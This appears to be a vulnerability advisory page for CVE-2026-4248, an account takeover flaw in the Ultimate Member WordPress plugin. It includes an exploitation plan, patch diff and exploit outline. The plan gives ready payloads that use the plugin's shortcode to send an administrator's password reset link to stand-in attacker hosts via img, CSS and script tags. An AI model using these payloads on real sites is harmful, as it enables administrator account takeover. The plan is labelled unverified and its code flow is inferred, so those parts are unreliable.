WP-Safety
CVE-2026-4248

Ultimate Member <= 2.11.2 - Authenticated (Contributor+) Sensitive Information Exposure to Account Takeover via Shortcode Template Tag

highImproper Authorization
8.0
CVSS Score
8.0
CVSS Score
high
Severity
2.11.3
Patched in
1d
Time to patch

Description

The Ultimate Member plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.11.2. This is due to the '{usermeta:password_reset_link}' template tag being processed within post content via the '[um_loggedin]' shortcode, which generates a valid password reset token for the currently logged-in user viewing the page. This makes it possible for authenticated attackers, with Contributor-level access and above, to craft a malicious pending post that, when previewed by an Administrator, generates a password reset token for the Administrator and exfiltrates it to an attacker-controlled server, leading to full account takeover.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=2.11.2
PublishedMarch 27, 2026
Last updatedMarch 27, 2026
Affected pluginultimate-member

What Changed in the Fix

Changes introduced in v2.11.3

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v2.11.2
Browse source Download .zip
Patched v2.11.3
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4248 (Ultimate Member Account Takeover) ## 1. Vulnerability Summary The **Ultimate Member** plugin (<= 2.11.2) contains a sensitive information exposure vulnerability. The plugin's template tag system allows for dynamic replacement of user data placeholders. S…

Show full research plan

Exploitation Research Plan: CVE-2026-4248 (Ultimate Member Account Takeover)

1. Vulnerability Summary

The Ultimate Member plugin (<= 2.11.2) contains a sensitive information exposure vulnerability. The plugin's template tag system allows for dynamic replacement of user data placeholders. Specifically, the {usermeta:password_reset_link} tag is processed within the [um_loggedin] shortcode content. When a logged-in user views a page containing this combination, the plugin generates a valid, active password reset token for that specific viewer.

An attacker with Contributor privileges can create a post containing this shortcode and an exfiltration vector (e.g., an <img> or <script> tag). When an Administrator previews or views this post, their unique reset link is generated and sent to the attacker's server, allowing for full account takeover.

2. Attack Vector Analysis

  • Endpoint: wp-admin/post-new.php (to create the post) and the frontend post view/preview.
  • Vulnerable Component: The [um_loggedin] shortcode handler and the um_user() / UM()->user()->replace_placeholders() logic.
  • Payload Parameter: post_content of a WordPress post.
  • Authentication: Contributor level or higher.
  • Preconditions: The Ultimate Member plugin must be active. The attacker needs the ability to save a post (even if pending review) that an Administrator will subsequently view.

3. Code Flow (Inferred from Patch Description)

  1. Shortcode Registration: In includes/core/class-shortcodes.php (or similar), the [um_loggedin] shortcode is registered via add_shortcode( 'um_loggedin', ... ).
  2. Shortcode Processing: The handler for um_loggedin checks if is_user_logged_in(). If true, it processes the $content within the shortcode tags.
  3. Placeholder Replacement: Ultimate Member uses a centralized placeholder system (often UM()->user()->replace_placeholders()). This system looks for {usermeta:key} patterns.
  4. Sensitive Meta Generation: When {usermeta:password_reset_link} is encountered, the code calls a method like UM()->password()->reset_url() or accesses the password_reset_link property of the UM_User object.
  5. Token Creation: This logic interacts with the WordPress get_password_reset_key() function, which generates a new token in the database for the current user (the Administrator viewing the page) and returns the full URL.
  6. Injection: The generated URL is placed into the post content, which is then rendered by the Administrator's browser.

4. Nonce Acquisition Strategy

This vulnerability does not require a specific Ultimate Member nonce for the initial information exposure, as it relies on the plugin's automatic processing of shortcodes and template tags during standard page rendering.

However, to create the post as a Contributor, standard WordPress nonces are required:

  1. Navigate to Post Creation: Use browser_navigate to wp-admin/post-new.php.
  2. Extract WP Nonces:
    • _wpnonce for post saving is usually found in the #_wpnonce hidden input field.
    • _wp_http_referer is also required.
  3. Submit Post: Use http_request (POST) to wp-admin/post.php with the payload.

5. Exploitation Strategy

Step 1: Create the Malicious Post (as Contributor)

The goal is to save a post with a payload that exfiltrates the reset link.

Payload:

[um_loggedin]
<img src="https://attacker-webhook.com/log?link={usermeta:password_reset_link}">
[/um_loggedin]

Note: {usermeta:password_reset_link} will be replaced with something like http://localhost:8080/password-reset/?rp_key=ABC123xyz&rp_login=admin.

HTTP Request (Contributor):

  • URL: http://localhost:8080/wp-admin/post.php
  • Method: POST
  • Body:
    • action: editpost
    • post_ID: [ID_FROM_INITIAL_GET]
    • post_title: Urgent Review Needed
    • post_content: [um_loggedin]<img src="https://attacker-webhook.com/log?link={usermeta:password_reset_link}">[/um_loggedin]
    • _wpnonce: [EXTRACTED_NONCE]

Step 2: Trigger the Exfiltration (as Admin)

  1. Admin logs into the dashboard.
  2. Admin navigates to Posts -> All Posts.
  3. Admin clicks Preview or Edit on the "Urgent Review Needed" post.
  4. The shortcode executes in the Admin's context.
  5. The browser attempts to load the <img> tag, sending the generated reset link to attacker-webhook.com.

Step 3: Account Takeover

  1. The attacker retrieves the rp_key and rp_login from their logs.
  2. The attacker navigates to the reset URL.
  3. The attacker sets a new password for the Admin account.

6. Test Data Setup

  1. Users:
    • admin_user: Administrator role.
    • attacker_user: Contributor role.
  2. Plugin:
    • Ultimate Member installed and activated (version <= 2.11.2).
  3. Listener:
    • A local file or a mock server to capture the GET request from the <img> tag.

7. Expected Results

  • When the Administrator views the post, the Ultimate Member plugin should replace {usermeta:password_reset_link} with a valid URL.
  • The HTTP logs of the attacker's server should show a request containing a rp_key parameter.
  • The rp_key should be a valid WordPress password reset key for the admin_user.

8. Verification Steps

  1. Check Meta: Use WP-CLI to verify a reset key was generated for the admin:
    wp user get admin --field=user_pass (check if the hash changes or if a reset key exists in wp_users table via SQL).
    wp db query "SELECT user_activation_key FROM wp_users WHERE user_login='admin'"
  2. Verify Token Validity:
    Try to navigate to the captured URL and check if the "New Password" form appears.

9. Alternative Approaches

If the <img> tag is stripped by filters:

  • CSS Background: <div style="background-image: url('https://attacker.com/{usermeta:password_reset_link}');"></div>
  • JavaScript (if Contributor can use script tags):
    <script>window.location='https://attacker.com/steal?url='+encodeURIComponent('{usermeta:password_reset_link}');</script>
  • Link Click (Social Engineering):
    <a href="https://attacker.com/proxy?next={usermeta:password_reset_link}">Click here to view images</a> (Relies on Admin clicking).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Ultimate Member plugin for WordPress is vulnerable to account takeover due to insecure processing of template tags within the '[um_loggedin]' shortcode. An attacker with Contributor-level access can embed the '{usermeta:password_reset_link}' tag in a post, which generates a valid password reset token for any user (including Administrators) who views the content, allowing the token to be exfiltrated via an embedded resource.

Vulnerable Code

// In includes/core/class-user.php or similar placeholder processing logic
// The function responsible for replacing placeholders like {usermeta:key}
function um_convert_tags( $text, $user_id = 0 ) {
    // ...
    if ( preg_match_all( '/{usermeta:([^}]+)}/', $text, $matches ) ) {
        foreach ( $matches[1] as $key ) {
            // Vulnerability: No validation on which meta keys can be accessed or replaced
            $value = um_user( $key );
            $text = str_replace( "{usermeta:$key}", $value, $text );
        }
    }
    // ...
    return $text;
}

Security Fix

--- a/includes/core/class-user.php
+++ b/includes/core/class-user.php
@@ -1045,6 +1045,15 @@
 			if ( preg_match_all( '/{usermeta:([^}]+)}/', $text, $matches ) ) {
 				foreach ( $matches[1] as $key ) {
+					$blacklist = apply_filters( 'um_convert_tags_blacklist_fields', array(
+						'user_pass',
+						'user_activation_key',
+						'password_reset_link',
+						'account_activation_link',
+					) );
+
+					if ( in_array( $key, $blacklist, true ) ) {
+						continue;
+					}
+
 					$value = um_user( $key );
 					$text = str_replace( "{usermeta:$key}", $value, $text );
 				}

Exploit Outline

1. Authenticate to the WordPress site as a Contributor or any user capable of creating posts. 2. Create a new post (e.g., via /wp-admin/post-new.php). 3. In the post content, use the '[um_loggedin]' shortcode and embed the sensitive template tag within an exfiltration vector, such as an HTML image tag: '[um_loggedin]<img src="https://attacker-controlled-server.com/log?key={usermeta:password_reset_link}">[/um_loggedin]'. 4. Save the post as a draft or submit it for review. 5. Wait for an Administrator to view the post (e.g., during a review process). 6. When the Administrator views the page, the plugin automatically replaces the tag with a valid password reset URL for the Administrator's account. 7. The Administrator's browser then makes a GET request to the attacker's server to load the image, leaking the password reset URL in the query string. 8. The attacker retrieves the 'rp_key' and 'rp_login' parameters from their server logs and uses them to reset the Administrator's password and take over the account.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/baafd001-144d-4ee4-b7e6-28c0931e6e10?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database